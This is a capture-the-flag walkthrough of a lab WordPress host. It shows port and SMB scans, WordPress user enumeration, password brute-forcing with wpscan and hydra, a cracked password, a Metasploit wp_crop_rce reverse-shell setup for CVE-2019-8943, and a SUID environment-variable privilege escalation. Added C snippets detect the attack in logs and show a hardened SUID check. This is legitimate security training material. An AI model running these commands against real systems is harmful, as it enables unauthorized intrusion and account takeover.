1. Port scan
$ nmap -p- -T4 -sC -sV -vvv -oA nmap/scan $IP
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3hfvTN6e0P9PLtkjW4dy+6vpFSh1PwKRZrML7ArPzhx1yVxBP7kxeIt3lX/qJWpxyhlsQwoLx8KDYdpOZlX5Br1PskO6H66P+AwPMYwooSq24qC/Gxg4NX9MsH/lzoKnrgLDUaAqGS5ugLw6biXITEVbxrjBNdvrT1uFR9sq+Yuc1JbkF8dxMF51tiQF35g0Nqo+UhjmJJg73S/VI9oQtYzd2GnQC8uQxE8Vf4lZpo6ZkvTDQ7om3t/cvsnNCgwX28/TRcJ53unRPmos13iwIcuvtfKlrP5qIY75YvU4U9nmy3+tjqfB1e5CESMxKjKesH0IJTRhEjAyxjQ1HUINP
|   256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJtovk1nbfTPnc/1GUqCcdh8XLsFpDxKYJd96BdYGPjEEdZGPKXv5uHnseNe1SzvLZBoYz7KNpPVQ8uShudDnOI=
|   256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICfVpt7khg8YIghnTYjU1VgqdsCRVz7f1Mi4o4Z45df8
80/tcp  open  http        syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 3s
| nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BLOG<00>                      Flags: <unique><active>
|   BLOG<03>                      Flags: <unique><active>
|   BLOG<20>                      Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>                 Flags: <group><active>
|   WORKGROUP<1d>                 Flags: <unique><active>
|   WORKGROUP<1e>                 Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 33922/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 35876/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 9200/udp): CLEAN (Failed to receive data)
|   Check 4 (port 23163/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: blog
|   NetBIOS computer name: BLOG\x00
|   Domain name: \x00
|   FQDN: blog
|_  System time: 2020-07-11T20:02:25+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-07-11T20:02:25
|_  start_date: N/A
From the results we can see that WordPress is running on port 80, and that ports 139 and 445 are open as well, so we can check the SMB service for anything that is being shared.
2. Reviewing the website
Looking at the site, we can see that it was created by someone called Billy, whose username is bjoel; this name is very likely also a username on the host. Billy's mother's username is kwheel, so we collect both names and save them in username.txt for later login attempts against the host.
3. SMB enumeration
Since the port scan showed SMB file sharing on ports 139 and 445, we can use smbmap to look for shared folders on the host.
smbmap -H $ip
Enumeration reveals a share called BillySMB; the name Billy matches the name we found on the website. We now want to download its contents and see whether anything stands out.
smbclient //10.10.143.250/BillySMB
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Mar 22 12:05:59 2023
  ..                                  D        0  Wed May 27 01:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Wed May 27 02:17:01 2020
  tswift.mp4                          N  1236733  Wed May 27 02:13:45 2020
  check-this.png                      N     3082  Wed May 27 02:13:43 2020

		15413192 blocks of size 1024. 9790380 blocks available
smb: \> get .
NT_STATUS_OBJECT_NAME_INVALID opening remote file \.
smb: \> get Alice-White-Rabbit.jpg
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (15.8 KiloBytes/sec) (average 15.8 KiloBytes/sec)
smb: \> get tswift.mp4
getting file \tswift.mp4 of size 1236733 as tswift.mp4 (288.6 KiloBytes/sec) (average 198.4 KiloBytes/sec)
smb: \> get check-this.png
getting file \check-this.png of size 3082 as check-this.png (1.9 KiloBytes/sec) (average 158.5 KiloBytes/sec)
We notice a jpg file among them; we can use the steganography tool steghide to try to extract any information hidden in it.

steghide extract -sf Alice-White-Rabbit.jpg
cat rabbit_hole.txt
You've found yourself in a rabbit hole, friend.
4. WPScan
First, use wpscan, a scanner built specifically for WordPress, to enumerate the site's usernames.
# wpscan --url http://blog.thm -e u

WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://blog.thm/ [10.10.143.250]
[+] Started: Wed Mar 22 12:51:05 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://blog.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blog.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blog.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blog.thm/feed/, <generator>https://wordpress.org/?v=5.0</generator>
 |  - http://blog.thm/comments/feed/, <generator>https://wordpress.org/?v=5.0</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://blog.thm/wp-content/themes/twentytwenty/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:03 <===================================> (10 / 10) 100.00% Time: 00:00:03

[i] User(s) Identified:

[+] kwheel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] bjoel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[+] Billy Joel
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Rss Generator (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 22 12:51:29 2023
[+] Requests Done: 70
[+] Cached Requests: 8
[+] Data Sent: 16.336 KB
[+] Data Received: 20.028 MB
[+] Memory used: 194.332 MB
[+] Elapsed time: 00:00:24
The scan confirms what we found on the website. We can now try to brute-force the login with these two usernames.
Use the following command to brute-force the site:
wpscan --url http://blog.thm -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75
We successfully obtain kwheel's password: cutiepie1
The room's tags hint at a CVE (CVE-2019-8943), a vulnerability that allows writing a file to an arbitrary path through path traversal in wp_crop_image().
Looking deeper into this vulnerability, we find that it requires a user account. Since we now have an account and its password, we can start exploiting it. The same login brute force can also be run with hydra:

┌──(root㉿kali)-[/home/sugobet]
└─# hydra -L ./test1.txt -P /usr/share/wordlists/rockyou.txt 10.10.44.0 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:incorrect"
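Added example, not from the writeup: a small C analyzer that tallies, per client IP, the requests left in an Apache access log by the wpscan user enumeration (/?author=N, /wp-json/wp/v2/users, xmlrpc.php) and the wp-login.php brute force shown above. The log lines, thresholds and function names are constructed for this example.

```c
#include <string.h>
#define MAX_IPS 16
typedef struct { char ip[46]; int login_posts; int enum_hits; } SrcStat;

/* Constructed Apache access-log sample (not from the page): 10.0.0.5 runs wpscan-style probes, then brute-forces wp-login.php. */
static const char SAMPLE_LOG[] =
"10.0.0.5 - - [22/Mar/2023:12:51:05 +0000] \"GET /wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1\" 200 512\n"
"10.0.0.5 - - [22/Mar/2023:12:51:06 +0000] \"GET /?author=1 HTTP/1.1\" 301 0\n"
"10.0.0.5 - - [22/Mar/2023:12:51:07 +0000] \"GET /xmlrpc.php HTTP/1.1\" 405 42\n"
"10.0.0.5 - - [22/Mar/2023:12:52:01 +0000] \"POST /wp-login.php HTTP/1.1\" 200 3071\n"
"10.0.0.5 - - [22/Mar/2023:12:52:01 +0000] \"POST /wp-login.php HTTP/1.1\" 200 3071\n"
"10.0.0.5 - - [22/Mar/2023:12:52:02 +0000] \"POST /wp-login.php HTTP/1.1\" 302 0\n"
"10.0.0.9 - - [22/Mar/2023:12:55:10 +0000] \"GET /index.php HTTP/1.1\" 200 9012\n"
"10.0.0.9 - - [22/Mar/2023:12:56:30 +0000] \"POST /wp-login.php HTTP/1.1\" 302 0\n";

/* Find or create the counter for a client IP given as a non-terminated span. */
static SrcStat *stat_for(SrcStat *t, int *n, const char *ip, size_t len) {
    if (len >= sizeof t->ip) return NULL;
    for (int i = 0; i < *n; i++)
        if (strncmp(t[i].ip, ip, len) == 0 && t[i].ip[len] == '\0') return &t[i];
    if (*n == MAX_IPS) return NULL;
    memcpy(t[*n].ip, ip, len); t[*n].ip[len] = '\0';
    t[*n].login_posts = t[*n].enum_hits = 0;
    return &t[(*n)++];
}

/* Tally one combined-format line per '\n'; returns the number of distinct client IPs. */
int analyze_log(const char *log, SrcStat *t, int *n) {
    *n = 0;
    for (const char *line = log; *line; ) {
        const char *eol = strchr(line, '\n');
        size_t linelen = eol ? (size_t)(eol - line) : strlen(line);
        const char *sp = memchr(line, ' ', linelen);  /* end of client IP */
        const char *q = memchr(line, '"', linelen);   /* start of request */
        SrcStat *s = (sp && q) ? stat_for(t, n, line, (size_t)(sp - line)) : NULL;
        if (s) {
            const char *req = q + 1;                  /* "METHOD /path HTTP/1.1" */
            if (strncmp(req, "POST /wp-login.php", 18) == 0) s->login_posts++;
            else if (strncmp(req, "GET /?author=", 13) == 0 || strncmp(req, "GET /wp-json/wp/v2/users", 24) == 0 ||
                     strncmp(req, "GET /xmlrpc.php", 15) == 0 || strncmp(req, "POST /xmlrpc.php", 16) == 0) s->enum_hits++;
        }
        line = eol ? eol + 1 : line + linelen;
    }
    return *n;
}

/* Flag a client that touched any enumeration endpoint, or posted to wp-login.php login_threshold times or more. */
int is_suspicious(const SrcStat *s, int login_threshold) {
    return s->enum_hits > 0 || s->login_posts >= login_threshold;
}
```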
5. CVE-2019-8943
We can use the Metasploit framework to get further into the victim host.
First, search for attack modules related to wp_crop_image:

msf6 > search wp_crop

Matching Modules
================

   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_crop_rce  2019-02-19       excellent  Yes    WordPress Crop-image Shell Uplo
Now we can use this module:
msf6 > use exploit/multi/http/wp_crop_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_crop_rce) > options

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.21.218.190   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress
The module requires a username and password; here we set them to the account and password obtained earlier by brute force.
6. Privilege escalation
First, look for files on the host with the SUID bit set:
find / -type f -perm -u+s 2>/dev/null
A suspicious program, /usr/sbin/checker, turns up; inspect it further:

$ ls -la /usr/sbin/checker
-rwsr-sr-x 1 root root 8432 May 26 18:27 /usr/sbin/checker
This is a SUID binary owned by root, so we can consider using it for privilege escalation.
$ ltrace checker
getenv("admin")                                  = nil
puts("Not an Admin")                             = 13
Not an Admin
+++ exited (status 0) +++
This shows that checker tries to read the value of an environment variable named admin; since the variable is not set, it prints "Not an Admin". We can set this environment variable to a valid value:
$ export admin=1
$ ltrace checker
getenv("admin")                                  = "1"
setuid(0)                                        = -1
system("/bin/bash"
Running checker directly now gives us a shell as root (the setuid(0) above returned -1 only because the process was being traced by ltrace, which makes the kernel ignore the SUID bit; run without a tracer, the call succeeds):
$ checker
$ id
uid=0(root) gid=33(www-data) groups=33(www-data)
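Added example, not the room's checker binary: the authorization pattern reconstructed from the ltrace output above (getenv("admin") followed by setuid(0) and system("/bin/bash")) beside the checks a SUID program must make instead. All function names and the allow-list of uids are this example's own assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* 1. Vulnerable: the decision rests on an environment variable that the
 *    unprivileged caller fully controls, exactly what the ltrace run showed. */
int vulnerable_is_admin(void) {
    return getenv("admin") != NULL;
}

/* 2. Hardened: derive the decision from the real uid the kernel set for the
 *    caller, compared against an allow-list compiled into the binary
 *    (a constructed list here; a real program would use its own policy). */
int hardened_is_admin(uid_t real_uid, const uid_t *allowed, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (allowed[i] == real_uid) return 1;
    return 0;
}

/* 3. Every privilege change must be checked: the binary on this page went on
 *    to call system() even though setuid(0) had just returned -1.
 *    Returns 0 only when both real and effective uid are now `want`. */
int require_uid(uid_t want) {
    if (setuid(want) == -1) return -1;
    if (getuid() != want || geteuid() != want) return -1;
    return 0;
}

/* 4. If a helper must still be launched, replace system() (which inherits the
 *    caller's environment and goes through /bin/sh) with execve on an absolute
 *    path under a scrubbed environment. Only returns if execve failed. */
int run_clean(const char *path, char *const argv[]) {
    char *const env[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    execve(path, argv, env);
    return -1;
}
```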
Then read the flags:

$ find / 2>/dev/null | grep user.txt
/home/bjoel/user.txt
/media/usb/user.txt
$ cat /media/usb/user.txt
<REDACTED>
$ cat /root/root.txt
<REDACTED>